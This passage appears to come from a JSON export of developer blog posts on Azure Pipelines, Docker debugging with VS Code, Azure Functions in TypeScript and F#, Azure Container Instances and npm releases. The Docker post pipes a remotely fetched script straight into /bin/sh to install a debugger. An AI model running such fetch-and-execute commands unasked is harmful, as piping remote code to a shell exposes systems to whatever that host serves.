"https://www.aaron-powell.com/posts/2019-04-12-using-a-specific-go-version-on-azure-pipelines/", "date": "Fri, 12 Apr 2019 10:03:30 +1000", "tags": [ "azure-devops", "golang" ], "description": "How to setup an Azure Pipeline agent to use a specific version of Go for a build", "content": "With Azure Pipelines we can build applications with many different languages, one of which is Go.\nIf you’re using a Hosted Agent, which is the recommended way (since you don’t need to manage your own machines), you are at the mercy of what software is installed on the agent. But if you’re building an application to target a specific runtime, say Go 1.12.3 (the latest at the time of writing), you might be out of luck as the agent doesn’t have that installed on it.\nSo let’s take a look at how to setup Go as part of your pipeline.\nSide note: You can also use Docker for your builds, but Docker isn’t for everyone, so I’m focusing on non-containerised agents here. Docker can also be a challenge if you need several runtimes, to say, build a web application with Go + WASM support.\nWe’re going to be modifying the standard Go Azure Pipeline, so start with that a template.\nSetting up our variables The first thing we’ll want to do is modify the variables that Go will be expecting, specifically GOPATH and GOROOT. By default, these point to one of the versions of Go on the agent, but we’ll modify them to use our version of Go.\n1 2 3 4 5 variables: GOPATH: '$(Agent.BuildDirectory)/gopath' # Go workspace path GOROOT: '$(Agent.BuildDirectory)/go' # Go installation path GOBIN: '$(GOPATH)/bin' # Go binaries path modulePath: '$(GOPATH)/src/github.com/$(build.repository.name)' # Path to the module's code We’ll using one of the Agents pre-defined variables, Agent.BuildDirectory, as it’s somewhere I know I can write to on the Agent, and it’s scoped to my build in particular.\nThe GOPATH is going to be a new folder we’ll create and GOROOT will be where Go is unpacked to. These will now be environment variables so when Go eventually executes, it’ll be the right version of Go.\nDownloading Go Next, we’ll add a new step to download and unpack the version of Go we want to target:\n1 2 3 4 5 steps: - script: | wget "https://storage.googleapis.com/golang/go1.12.3.linux-amd64.tar.gz" --output-document "$(Agent.BuildDirectory)/go1.12.3.tar.gz" tar -C '$(Agent.BuildDirectory)' -xzf "$(Agent.BuildDirectory)/go1.12.3.tar.gz" displayName: 'Install Go 1.12' Since we know my agent is a Linux agent (from the pool defined in the template) we’ll use wget to download the Linux binaries and drop them into the Agent.BuildDirectory. With that done we can unpack it with tar, specifying that we want to unpack to Agent.BuildDirectory, and given the structure of the tar.gz contains a folder named go we’ll end up with a path that matches GOROOT nicely.\nLastly, we need to ensure that the PATH of the agent knows about this version of Go, and we do that by setting output variables:\n1 2 3 - script: | echo '##vso[task.prependpath]$(GOBIN)' echo '##vso[task.prependpath]$(GOROOT)/bin' This is covered in the Set up a Go workspace step in the docs guide.\nNow the rest of the pipeline can follow exactly as the template describes!\nConclusion Version pinning of dependencies is really important to ensure that we have repeatable builds over time. Since we don’t want to end up in a situation where we manually manage our agent pool we want our build definition to prepare the agent to the environment we desire, including setting up the appropriate runtimes.\nYou can see a full pipeline definition on my GitHub that utilises this approach.\nYou could also use this approach to prepare multiple different versions of Go to create a build matrix against several runtime releases, but I’ll leave that as an exercise to you, dear reader 😉.\n", "id": "2019-04-12-using-a-specific-go-version-on-azure-pipelines" }, { "title": "Debugging your .NET Core in Docker applications with VS Code", "url": "https://www.aaron-powell.com/posts/2019-04-04-debugging-dotnet-in-docker-with-vscode/", "date": "Thu, 04 Apr 2019 11:54:45 +1100", "tags": [ "docker", ".net", "vscode", "debugging" ], "description": "Using VS Code to debug a .NET Core application running within a Docker container", "content": "One of the nicest things about building applications of .NET Core is that its cross-platform support means that we can deploy our application as a Docker container. If you’re using Visual Studio it has built in support for Docker but that’s not going to work if you’re on Mac or Linux, of if like me, you prefer to use VS Code as your editor.\nSo if you create your Dockerfile for .NET it looks something like this:\n1 2 3 4 FROM mcr.microsoft.com/dotnet/core/sdk:2.2 WORKDIR /app COPY ./bin/Debug/netcoreapp2.2/publish . ENTRYPOINT ["dotnet", "MyApplication.dll"] Great! We can run our application now by building that image and starting the container, but what happens if we want to debug it?\nEnabling remote debugging If you think about it logically, when running an application in Docker it’s essentially being run remotely. Sure, it might be remotely on the same machine, but it’s still “remote”, and this is how we need to think about debugging!\nTo do this we’ll need to install MIEngine into our Docker image as it’s being built, and to do that we’ll add a new layer into our Dockerfile:\n1 2 3 4 5 6 7 FROM mcr.microsoft.com/dotnet/core/sdk:2.2 RUN apt update && \\ apt install unzip && \\ curl -sSL https://aka.ms/getvsdbgsh | /bin/sh /dev/stdin -v latest -l /vsdbg WORKDIR /app COPY ./bin/Debug/netcoreapp2.2/publish . ENTRYPOINT ["dotnet", "MyApplication.dll"] The new RUN layer will first update apt to get all the latest package references, then install unzip and finally execute curl which pipes to /bin/sh. It might seem a bit confusing, but that’s because we’re chaining three commands together into a single layer to reduce the size of our Docker image. Really the most important part is this line:\n1 curl -sSL https://aka.ms/getvsdbgsh | /bin/sh /dev/stdin -v latest -l /vsdbg This downloads a sh script from https://aka.ms/getvsdbgsh and pipes it straight to /bin/sh for execution and provides a few arguments, most importantly the /vsdbg which is where the remote debugger will be extracted to.\nNow our image has the debugger installed into it we need to setup VS Code to attach to it.\nAttaching VS Code to a remote debugger We’re going to add a new entry to our launch.json file that is of "type": "coreclr" and "request": "attach". This will cause VS Code to launch the process picker and allow us to pick our .NET Core process.\nBut wait, that’s running in a Docker container, how do I pick that process?\nWell, thankfully the process picker dialogue is capable of executing a command to get the list of processes and can do it against a remote machine.\nUnder the hood it will execute docker exec -i <container name> /vsdbg/vsdbg to list the processes within the container, but we’ll do it a little bit nicer:\n1 2 3 4 5 6 7 8 9 10 11 12 13 { "name": ".NET Core Docker Attach", "type": "coreclr", "request": "attach", "processId": "${command:pickRemoteProcess}", "pipeTransport": { "pipeProgram": "docker", "pipeArgs": [ "exec", "-i", "sunshine-downloader" ], "debuggerPath": "/vsdbg/vsdbg", "pipeCwd": "${workspaceRoot}", "quoteArgs": false } } Now if you run your container and then launch the debugger in VS Code you’ll be able to pick the dotnet process within the container that your application is using.\nConclusion And there you have it, you can now use VS Code as your editor of choice and also debug applications running in Docker containers. There are more advanced scenarios you can tackle with this including debugging via SSH, all of which are covered on OmniSharp’s wiki.\nIn fact, I’m using this to debug an F# application I’m building to run on .NET Core. 😉\nHappy debugging! 😁\nBonus Idea: Removing the additional layer with volumes When I shared this post internally my colleague Shayne Boyer brought up an idea on how to tackle this without adding a new layer to your Dockerfile, and in fact, making it possible to debug pre-built images (assuming they have the debugging symbols in them).\nYou can do this by downloading the vsdbg package for the distro your image is based off (Ubuntu, Alpine, ARM, etc.), which you can determine by reading the shell script (or download into a container 😉) onto your machine and then mounting the path as a volume when starting your container:\n1 docker run --rm -v c:/path/to/vsdbg:/vsdbg --name my-dotnet-app my-dotnet-app Now you’ve inserted the debugger into the container when you start it rather than bundling it into the image.\n", "id": "2019-04-04-debugging-dotnet-in-docker-with-vscode" }, { "title": "Typed Bindings for TypeScript Azure Functions", "url": "https://www.aaron-powell.com/posts/2019-04-03-typed-bindings-for-azure-functions/", "date": "Wed, 03 Apr 2019 09:03:52 +1100", "tags": [ "typescript", "azure-functions", "serverless" ], "description": "", "content": "A few weeks ago Microsoft announced their improvements to TypeScript Azure Functions with some new templates to help you get started.\nAs I’m currently doing a bunch of stuff with Azure Functions I decided to give it a go and share some of my learnings. Today I want to talk about how to improve the typedness of Azure Functions with TypeScript.\nWith TypeScript, and naturally JavaScript, we rely on the function.json file to create our bindings to different services (since we don’t have a static type system like .NET functions can leverage). But this results in a disconnect between what we’re binding and what our editor knows about.\nA standard HTTP Trigger binding will see a file scaffolded like this in TypeScript:\n1 2 3 4 5 6 7 import { AzureFunction, Context, HttpRequest } from "@azure/functions" const httpTrigger: AzureFunction = async function (context: Context, req: HttpRequest): Promise<void> { // function code here } export default httpTrigger; Here we’re relying on a bunch of primitive types provided by the Functions TypeScript package, but it doesn’t understand our application at all.\nExtending built-in interfaces To improve on this I’ve started extending the built-in interfaces that are provided in the @azure/functions package to understand the bindings I’m creating, like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import { AzureFunction, Context, HttpRequest } from "@azure/functions" interface InputHttpRequest extends HttpRequest { query: { name: string } } const httpTrigger: AzureFunction = async function (context: Context, req: InputHttpRequest): Promise<void> { const name = req.query.name; // function body }; export default httpTrigger; For this example instead of leaving req.query with the type [key: string]: string, meaning it’s a dictionary of anything, I’m saying that I expect the query string provided to have name as one value (and potentially others, but I only care about name). This then gives me good code completion of just how I expect my type to look and when I create tests I know the shape of the object as well.\nTyping bindings Let’s say that you’ve got two additional bindings on your function, a queue output and HTTP response output. Again we can extend the built in types to achieve this, this time we’ll extend Context.\nHere’s the bindings from our function.json:\n1 2 3 4 5 6 7 8 9 10 11 12 { "type": "http", "direction": "out", "name": "res" }, { "type": "queue", "direction": "out", "name": "myQueue", "queueName": "my-queue", "connection": "QueueConnectionString" } And the TypeScript:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 interface InputFunctionContext extends Context { bindings: { myQueue: string[] } res: { status?: number body: string } } const httpTrigger: AzureFunction = async function (context: InputFunctionContext, req: InputHttpRequest): Promise<void> { // function code } Both bindings and res have a default type of { [key: string] : any } denoting that they can have as many properties and they are untyped, but we know from our function.json what they should be and we can set them accordingly.\nYou can do the same with input bindings such as Table and type them to the class that they are within your application normally.\nConclusion From what starts out as a very loosely typed design with TypeScript Azure Functions you can easily leverage type extending to make your function code more aware of the bindings and the types that they should represent.\nI’ve created a full working example on GitHub if you’d like to play with it yourself.\n", "id": "2019-04-03-typed-bindings-for-azure-functions" }, { "title": "Intro to Azure Container Instances", "url": "https://www.aaron-powell.com/posts/2019-03-20-intro-to-azure-container-instances/", "date": "Wed, 20 Mar 2019 09:00:27 +1100", "tags": [ "azure", "docker" ], "description": "A quick lap around how to use Azure Container Instances", "content": "Azure Container Instances (ACI) is the easiest way to run a container in the cloud. There’s no need to worry about orchestrators and you can get per-second billing, so why not get started!\nTo help you get started I’ve created a GitHub repository called ACI from scratch that will walk through a number of exercises in using the Azure CLI with ACI. You’ll need to setup an Azure account to get started, so grab a free trial if you don’t have one.\nCreating your first ACI resource When using the Azure CLI we’ll use the az container commands, let’s start creating one using the demo image:\naz container create --resource-group aci-from-scratch-01 --name aci-from-scratch-01-demo --image microsoft/aci-helloworld --dns-name-label aci-from-scratch-01-demo --ports 80 I’ve made the assumption you already created a Resource Group called aci-from-scratch-01, which the git repository covers. Also remember that the names of the resources we’re creating will need to be globally unique, so what I’m using in the demo you might want to change yourself to avoid collisions.\nThis command, az container create, is used to create the ACI resource in the resource group you specify. We’ve given it the name aci-from-scratch-01-demo, which is what will appear in the portal, and told it that we’ll use an image from the public Docker image repository, microsoft/aci-helloworld (the code for the image is here).\nBecause this image contains a web server we need to make sure that it’s publicly available, to do that we need to give it a DNS name using --dns-name-label and bind the port(s) that the container will require. Since this is a web server we’re binding port 80.\nNow our deployment is underway, we’ll shortly have it up and running and we can connect to our web server. To find the address of the server we can use the az container show:\n$> az container show --resource-group aci-from-scratch-01 --name aci-from-scratch-01-demo --query "{FQDN:ipAddress.fqdn,ProvisioningState:provisioningState}" --out table FQDN ProvisioningState ------------------------------------------------- ------------------- aci-from-scratch-01-demo.westus.azurecontainer.io Succeeded We’re filtering the output to only show the Fully Qualified Domain Name (FQDN) and Provisioning State (is it deploying, deployed, stopped, etc.) using the --query parameter. If you grab the FQDN and paste it into a browser you’ll see our demo app running!\nFinally, if you want to know what’s going on inside your container you can use az container logs:\naz container logs --resource-group aci-from-scratch-01 --name aci-from-scratch-01-demo This is similar to running a docker logs command but also shows some of the info from ACI itself. Here’s my output:\nlistening on port 80 ::ffff:10.240.255.56 - - [19/Mar/2019:04:03:33 +0000] "GET / HTTP/1.1" 200 1663 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" ::ffff:10.240.255.56 - - [19/Mar/2019:04:40:21 +0000] "GET / HTTP/1.1" 200 1663 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" Working with Azure Container Registry Azure Container Registry (ACR) is a private container registry that you can host your images in. ACR works very nicely with ACI by allowing you to link the two together with minimal effort so you can host containers you built yourself.\nWe use the az acr command to work with ACR and the first thing we’ll need to do is create our registry:\n$> az acr create --resource-group aci-from-scratch-02 --name acifromscratch02 --sku Basic --admin-enabled true { "adminUserEnabled": false, "creationDate": "2019-03-19T05:16:02.230750+00:00", "id": "/subscriptions/7e2b0a07-47db-4a2e-bfca-03c0d5b75f15/resourceGroups/aci-from-scratch-02/providers/Microsoft.ContainerRegistry/registries/acifromscratch02", "location": "westus", "loginServer": "acifromscratch02.azurecr.io", "name": "acifromscratch02", "networkRuleSet": null, "provisioningState": "Succeeded", "resourceGroup": "aci-from-scratch-02", "sku": { "name": "Basic", "tier": "Basic" }, "status": null, "storageAccount": null, "tags": {}, "type": "Microsoft.ContainerRegistry/registries" } Be aware that the name you give your registry can only have numbers and letters.\nThis will create us a registry using the cheapest tier, Basic, but you can change the --sku to be Standard or Premium if you need. The different sku’s mainly represent increased storage, with Premium also including geo replication. We also set --admin-enabled true so that we can use a username/password to push to the registry, alternatively, you can create a Service Principal and use that for authentication.\nFrom the JSON response, the most important piece of information is the loginServer, we’ll need that when it comes to pushing images up to the registry.\nAlso, before we push images we’ll need to log Docker into ACR, you can do that either via the Docker CLI or using az acr login --name <registry name>.\nNow it’s time to set the repository on the images, we do that by prefixing the loginServer from above to the image name to give it a fully qualified name. Let’s say we’ve previously built an image called aci-from-scratch-02:v1, we’ll add the registry to it like so:\n$> docker tag aci-from-scratch-02:v1 acifromscratch02.azurecr.io/aci-from-scratch-02:v1 $> docker push acifromscratch02.azurecr.io/aci-from-scratch-02:v1 By adding the repository prefix when we do a docker push Docker knows whether to push it to the public repository or to a 3rd party repository, which in our case we want.\nWe can then inspect ACR to see what images are there:\n$> az acr repository list --name acifromscratch02 --output table Result ------------------- aci-from-scratch-02 $> az acr repository show-tags --name acifromscratch02 --repository aci-from-scratch-02 --output table Result -------- v1 The command az acr repository list will show us what’s in the repository and then we can the results of that in the az acr repository show-tags by setting the name to the --repository option to see what tags exist for a particular image.\nIt’s time to create an ACI that uses the registry. Since we’ve enabled the admin account we need to get the password to login:\naz acr credential show --name acifromscratch02 --query "passwords[0].value" Ideally you’d want to assign this to a variable in your shell (bash/PowerShell/etc.) rather than writing it to stdout. That’d avoid it ending up in the shells history and potentially being compromised.\nWe’ve provided a --query "passwords[0].value" because there are two passwords and we only need one (there are two passwords so that there’s a backup should one be compromised and need resetting).\nNow we can provide credentials to ACI:\naz container create --resource-group aci-from-scratch-02 --name aci-from-scratch-02 --image acifromscratch02.azurecr.io/aci-from-scratch-02:v1 --cpu 1 --memory 1 --registry-login-server acifromscratch02.azurecr.io --registry-username acifromscratch02 --registry-password <password> --dns-name-label aci-from-scratch-02 --ports 80 Notice here that we’re providing the image name with the login server so that when ACI executes a docker pull it knows where to pull from. We also provide the --registry-login-server as the loginServer of our ACR, along with the ACR username and password.\nAccessing Azure Services Let’s say you’re building an application to run in ACI that needs to access another Azure Resource, maybe Azure SQL.\nACI allows us to set environment variables. These work just as you’d expect coming from Docker and can be created as either normal environment variables or secure environment variables. The primary difference between the two is that a secure variable won’t appear in the ACI log or if you query the info of the container.\nHere’s how we’d create a SQL connection string for a web application, note that I’m not using a secure environment variable here:\naz container create --resource-group aci-from-scratch-03 --name aci-from-scratch-03 --image acifromscratch03.azurecr.io/aci-from-scratch-03:v1 --registry-login-server acifromscratch03.azurecr.io --registry-username acifromscratch03 --registry-password <password> --dns-name-label aci-from-scratch-03 --ports 80 --environment-variables 'SQLAZURECONNSTR_DefaultConnection'='Server=tcp:aci-from-scratch-03-sql.database.windows.net,1433;Database=aci-from-scratch;User ID=aci;Password=<sql password>;Encrypt=true;Connection Timeout=30;' The environment variables are --environment-variables and you can set multiple by using a space between them. If you were to create a secret one then you’d use the --secrets option (but be aware, they will appear in the CLI that executed the command, so you’re better using shell variables to insert them).\nIf you’re planning to use secret variables you’re better off using a file deployment or Resource Manager template and inject the values into the file at runtime.\nConclusion Azure Container Instances is the easiest way to run a container, whether it’s a web server, a data processing job or as part of an event-driven architecture with Azure Functions/triggered from a Logic App/etc..\nCheck out the exercises on my GitHub repository, ACI from scratch, and walk through creating your first container instances.\n", "id": "2019-03-20-intro-to-azure-container-instances" }, { "title": "Pretty JavaScript Console Messages", "url": "https://www.aaron-powell.com/posts/2019-03-14-pretty-javascript-console/", "date": "Thu, 14 Mar 2019 13:44:34 +1100", "tags": [ "javascript", "fun" ], "description": "Add a bit of flare to your console.log messages", "content": "\nIf you’ve ever opened up your browser tools while logged into Facebook you might have noticed the above in it (at least, this is what it looks like at the time of writing).\nDOM warning aside, it looks a bit different to most console.log messages you’re probably generating, doesn’t it? A big bit of red text and some other slightly larger text. That’s a bit weird, isn’t it?\nAs it turns out the console functions have a number of formatting options, so if you want to display numbers to certain decimal places you can use %.#f like so:\n1 console.log('Pi to 5 decimal places: %.5f', Math.PI); But that only works in Firefox.\nIf you want to specify where an object appears in the log message you can use %O:\n1 console.log('We found an object, %O, in the system', { foo: 'bar' }); But that’s all well and good, how do we make big red text!\nFor that we’ll use the %c formatter to apply CSS at a point in the string:\n1 console.log('%cR%ca%ci%cn%cb%co%cw', 'font-size: 20px; color: blue;', 'font-size: 25px; color: lightblue;', 'font-size: 30px; color: lightgreen;', 'font-size: 35px; color: green', 'font-size: 30px; color: yellow;', 'font-size: 25px; color: orange', 'font-size: 20px; color: red') With %c you provide a string of CSS rules that will be applied until the end of the message being logged or another %c is found. This means you can create lovely rainbow effects like above, manipulating each element along the way. Or if you want to get really adventurous you can do something like this:\n1 console.log('%c' + 'This console is on fire', 'font-family:Comic Sans MS; font-size:50px; font-weight:bold; background: linear-gradient(#f00, yellow); border-radius: 5px; padding: 20px') Yep, we’re setting a gradient background for the text and adding some padding plus rounded corners!\nNow you can’t use all aspects of CSS (I haven’t been able to figure out if you can do animations for example) and it’s not overly useful. But hey, it’s a bit of fun, isn’t it! 😉\n", "id": "2019-03-14-pretty-javascript-console" }, { "title": "Docker for Windows AzureAD and Shared Drives", "url": "https://www.aaron-powell.com/posts/2019-03-07-docker-for-windows-azuread-shared-drives/", "date": "Thu, 07 Mar 2019 09:03:55 +1100", "tags": [ "docker" ], "description": "How to share drives when using AzureAD to log into Windows", "content": "Now that I work for Microsoft I have a device that I sign in using Azure Active Directory (AzureAD or OrgID) rather than the Microsoft Account (MSA) that I use to use.\nWhen setting up a new device I went to share my disk to Docker for Windows so I can mount volumes. Unfortunately there is a bug in Docker for Windows with authentication using AzureAD.\nEveryone’s solution seems to be to create a local admin account, which I find unappealing. A local account means it’s not sync’ed anywhere and I run the risk of losing stuff when I format a device.\nMy solution? Add my MSA to the device and set it as an administrator level account. A quick login using that account, then a log straight back out (I don’t intend to use that account anyway) and back to my AzureAD login. Now I can share the volume, enter my MSA credentials, and we are done!\nSo next time I’m setting up a device to use AzureAD as the login I’ll also add my MSA as an admin just so I can share a volume to Docker. Seems overkill, but 🤷‍♂, you gotta do what you gotta do.\n", "id": "2019-03-07-docker-for-windows-azuread-shared-drives" }, { "title": "Azure Functions With F#", "url": "https://www.aaron-powell.com/posts/2019-03-05-azure-functions-with-fsharp/", "date": "Tue, 05 Mar 2019 14:24:36 +1100", "tags": [ "fsharp", "serverless", "azure-functions" ], "description": "How to create an Azure Function using F#", "content": "I’m starting to work on a new project in which I’m going to use Azure Functions v2 for a simple API backend.\nAzure Functions support a number of different languages such as Java, Python (in preview at time of writing), TypeScript (and naturally JavaScript) and of course C#. So with all those to pick from what would I want to choose?\nWell, naturally I decided to go with F#, which kind of worked in v1. And after all, it’s a CLR language so there’s no reason it shouldn’t work in v2 like C# does.\nBut unfortunately there’s no templates available, so getting started seems to be a bit trickier.\nCreating an F# Functions Application To create a F# Functions Application the easiest approach is to follow the Visual Studio Code instructions to get the extensions installed.\nOnce VS Code is ready to go we’ll create a new New Functions Project choosing C# as the language.\nNow comes the tricky part, rename your csproj file to fsproj and add a reference to FSharp.Core.\nAnd you’re done!\nOk, it wasn’t really that tricky was it! Since it’s all on the CLR and it’s a .NET Core application the dotnet cli tools will just work! You’ll even get debugging support from within VS Code of your F# Functions.\nNow you’re ready to create a function with F#!\nHere’s a basic HTTP trigger:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 module HttpTrigger open Microsoft.Azure.WebJobs open Microsoft.AspNetCore.Mvc open Microsoft.Azure.WebJobs.Extensions.Http open Microsoft.AspNetCore.Http open System.IO open System.Text [<FunctionName("HttpTrigger")>] let httpTriggerFunction ([<HttpTrigger(AuthorizationLevel.Function, "post", Route = null)>] req : HttpRequest) = async { use reader = new StreamReader(req.Body, Encoding.UTF8) let! body = reader.ReadToEndAsync() |> Async.AwaitTask return OkObjectResult body } |> Async.StartAsTask Be aware that if you’re doing anything with async you’ll need to convert it to Task<'T> for the return as the Functions host expects the C# Task API for async, not F#’s Async workflows 😦.\nCaveat’s There’s a minor caveat to this whole thing, because the VS Code extension doesn’t understand F# you can’t use it to add new functions to your project, you have to manually do it, and you then have to know what NuGet packages that you require are going to be. I find it easy enough to just have another VS Code window open and create a C# one if I need to look up types and their packages.\nYou’ll also find that the .vscode/settings.json file contains "azureFunctions.projectLanguage": "C#". You can change that to F# if you want, but it’ll give you a warning because the extension doesn’t understand it. I leave it as C# because it doesn’t bother me.\nConclusion While the tooling might not be there, creating an Azure Function with F# really isn’t that big a deal.\n", "id": "2019-03-05-azure-functions-with-fsharp" }, { "title": "Releasing to npm From Azure DevOps", "url": "https://www.aaron-powell.com/posts/2019-02-18-releasing-to-npm-from-azure-devops/", "date": "Mon, 18 Feb 2019 09:16:17 +1100", "tags": [ "javascript", "azure-devops" ], "description": "How to setup CI/CD with Azure DevOps to deploy npm packages", "content": "In my recent article about creating a webpack loader to generate WebAssembly with Go I decided I wanted to be able to easily release the loader to npm as I was building it.\nTo do this I decided that I was going to use Azure DevOps as it gives me a nice separation between the build phase and the release phase. Also, a lot of people are unaware that Azure DevOps pipelines are free for open source projects, so again there’s a nice little bonus that we can leverage for our project.\nCreating a build The first step you need to do is create a build definition. We’ll do that by installing the Azure Pipelines GitHub application (if you haven’t already installed it) and activate it for our GitHub repository.\nWhen linking them we’ll authorise Azure DevOps to have access to our GitHub information and create a pipeline using the Node.js template definition as the base, but we’re going to customise it a bit before saving it.\nThe Node.js template looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 trigger: - master pool: vmImage: 'Ubuntu-16.04' steps: - task: NodeTool@0 inputs: versionSpec: '10.x' displayName: 'Install Node.js' - script: | npm install npm run build displayName: 'npm install and build' It’s stating that this build is triggered on the master branch, so PR’s won’t trigger this one (we could always trigger a different build for PR’s). Next it’s telling us that the build agents will be in the pool of Linux hosted agents, in particular Ubuntu 16.04 is the distro that will be used.\nNow we’re into the tasks the agent will run, first up is a task to install Node.js at the version you request. It’ll default to the latest LTS, but you can tweak that if you want to do version pinning or anything, just change the versionSpec property. Lastly we run a script task which will just execute a script in the shell of the agent (in this case, a Linux script, but it’s a Windows script if it was a Windows agent) that runs npm install and npm run build. It’s made an assumption that you’ve got a npm script called build that will do the build, so you can tweak that if you want. In fact you can do whatever changes you need, but this is simple for most scenarios. Also, depending on your preference for task roles you could split the install and build steps into separate tasks, that can make it easier to debug a failure if one is hit, rather than having to read the logs.\nIf you choose Save and Run it will offer to create an azure-pipelines.yaml file in your GitHub repository, either directly in master or in a branch to PR in, so pick your preferred approach, then our build will kick off and should complete successfully.\nSo how do we release something?\nGetting artifacts for release Our build will run on an agent, generate the stuff we wanted generate (in my case, converted TypeScript to JavaScript) but that only lived on that agent and when the agent is done it’s destroyed. Well that’s not very useful now is it, we want stuff off there to push to npm.\nTo do that we’ll edit our azure-pipelines.yaml file. First let’s generate a npm package that we can publish:\n1 2 3 - script: | npm pack displayName: 'Package for npm release' Again we’re using the script task to do this and we run the npm pack command which generates us a tgz file that can be sent to the npm package repository (or any other that you so desire). But why are we generating a package and not publishing? Well the reason is that we want to split the build phase of our pipeline from the release phase, so Continuous Integration then Continuous Delivery. Doing a release from our build step kind of muddies the waters on what’s responsible for what. Also, by generating the tgz file in the build we’re saying that this is what’ll be released and it can’t be changed, so if we had a staging npm repository we could push it to there, like we can do staging sites for applications. Ultimately, it makes the released artifact more immutable.\nWe’ve now generated a tgz file, next we need to attach it as an artifact to the build. An artifact is the output of a build that can be picked up elsewhere, either by a chained build, by a release, or just manually looking at the build results.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 - task: CopyFiles@2 inputs: sourceFolder: '$(Build.SourcesDirectory)' contents: '*.tgz' targetFolder: $(Build.ArtifactStagingDirectory)/npm displayName: 'Copy npm package' - task: CopyFiles@2 inputs: sourceFolder: '$(Build.SourcesDirectory)' contents: 'package.json' targetFolder: $(Build.ArtifactStagingDirectory)/npm displayName: 'Copy package.json' - task: PublishBuildArtifacts@1 inputs: pathtoPublish: '$(Build.ArtifactStagingDirectory)/npm' artifactName: npm displayName: 'Publish npm artifact' Using the Copy Files task we can get the files (our tgz and our package.json) and copy them across to the artifacts staging location defined by the variable $(Build.ArtifactStagingDirectory). This is a special directory that the agent has that’s intended to by published as artifacts. Once these files are in the right place we use the Publish Artifacts task to tell our build the files in the folder will be in a named artifact of npm. This name is important as we’ll use it in the future to access them, so make it something logical. I’ll also avoid using spaces in the name of the artifact so that you don’t have to do escaping when you try and use them.\nI’ll also copy across the release notes as well as the JavaScript files we generate from the TypeScript compiler as these can be useful for debugging.\nWhen it’s all said and done our build definition now looks like this and you can see its run history here.\nCreating a release Our build is passing, we’re getting artifacts output, it’s time we publish to npm.\nRight now the only way to create a release pipeline is using the designer in Azure Pipeline, there’s no YAML export, but it’s a good thing that we have a simple release pipeline then!\nWithin the Azure DevOps portal we’ll create a new release, use the Empty Job template and name our release stage (I’ve called it Publish).\nNow we need to define what the stages that our release will go through. A stage can represent an environment, so if you are releasing to UAT then Pre Prod and finally Production you’d have them all mapped out in the build. You can also define gates on each stage, whether there are approvers of a stage release, etc. but all of that is beyond what we need here, we’ve only got one stage, that’s releasing to npm. Check out the docs for more info on Stages.\nConveniently there’s a npm task provided by Azure DevOps that has some common commands defined, including the one we want, publish! Specify the path to our linked artifact named npm (which we named above) and choose to publish to an External npm registry (we use that because Azure DevOps can act as a npm registry).\nIf you haven’t done so previously you’ll need to create a service connection to the npm registry, use the New button for that and enter https://registry.npmjs.org as the source and a token that you can generate from the npm website under your profile.\nNow you’d think we’d be ready to roll right? Well… yes you do publish to npm but what you publish is a package that contains your tgz, not your tgz. You see, the publish command is capable of taking a tgz and publishing that to npm but there’s a bug in the Azure DevOps task that means it doesn’t work. So unfortunately we’ll need a workaround 😦.\nThankfully the workaround is pretty simple, we need to unpack the tgz file and use the publish task against its contents. We do that with the Extract Files task, specifing *.tgz as what we’ll extract (since we don’t know the filename) and give if a new folder. I used $(System.DefaultWorkingDirectory)/npm-publish. Now we can update our publish command to not use the artifact directory, but the unpacked directory, which in my case is $(System.DefaultWorkingDirectory)/npm-publish/package.\nWith our stage complete it’s time to link it to the build definition. We do that by adding an artifact, selecting the build pipeline we created and leaving the defaults.\nNote: I leave the Default Version as Specify at time of release creation as that gives the build control over the artifacts going in. For this scenario it doesn’t make a huge difference, but it can be useful in more complex setups.\nBecause we want a release to go out every time a build completes we’ll click the lightning bolt (⚡) on the artifact and enable the Continuous deployment trigger. Without this we’d need to manually trigger a release. If you had certain branches that shouldn’t ever cut a release (eg: gh-pages) then you can add a filter for them from here too.\nSave, run, boom! Releases happening to npm on push to master. Just remember, you’ll always have to update your package.json to have a new version number, else it’ll fail to publish to npm, since you can’t publish an existing release.\nAdding badges The last thing you want to do is add a badge to your readme to show off the awesome pipeline work. We can do that from the Build -> menu in the top-right corner and select ‘Status Badge’ and get some markdown like this:\n1 [![Build Status](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_apis/build/status/aaronpowell.webpack-golang-wasm-async-loader?branchName=master)](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_build/latest?definitionId=16&branchName=master) And it looks like this:\nCustomising the label I only recently found out that you can customise the text int he label for the Azure Pipelines badge. To do that add a query string to the image of label=<something cool>. It can even support an emoji 😉!\n1 [![Build Status](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_apis/build/status/aaronpowell.webpack-golang-wasm-async-loader?branchName=master&label=🚢 it)](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_build/latest?definitionId=16&branchName=master) ![Build Status](https://dev.azure.com/aaronpowell/webpack-golang-wasm-async-loader/_apis/build/status/aaronpowell.webpack-golang-wasm-async-loader?branchName=master&label=🚢 it)\nBonus round, releasing to GitHub Releasing to npm is good and all, but what if we wanted to also publish the release to GitHub, tag the commit correctly and ensure that anyone who just wants to get the raw files can get them?\nWell that we can also do with Azure DevOps!\nFirst we’re going to need to grab the version number of our release so that we can tag it appropriately on GitHub. I’ll use the Bash task (since I know I’m using a Linux agent) and just run an inline script:\n1 2 v=`node -p "const p = require('./package.json'); p.version;"` echo "##vso[task.setvariable variable=packageVersion]$v" I’m running a little inline Node.js script to get the version number from the package.json file that we attached as an artifact (so I set the working directory to $(System.DefaultWorkingDirectory)/aaronpowell.webpack-golang-wasm-async-loader/npm), alternatively, you could grab it from the unpacked tgz file (but I started this before I realised that I’d have to do that 😛). Next we use echo to create an Azure DevOps variable named packageVersion.\nThen we’ll use the GitHub Release task (which is in preview at time of writing) to generate our release.\nI choose what GitHub account I’ll publish under and the repository to release to (both show be available in the drop down lists), we’ll use Create for the action (it’s a new release after all) the Target is $(Build.SourceVersion) as that is the SHA of the commit the build was triggered for and that we want to tag, use our variable $(packageVersion) as the Tag with a Tag Source of User specified 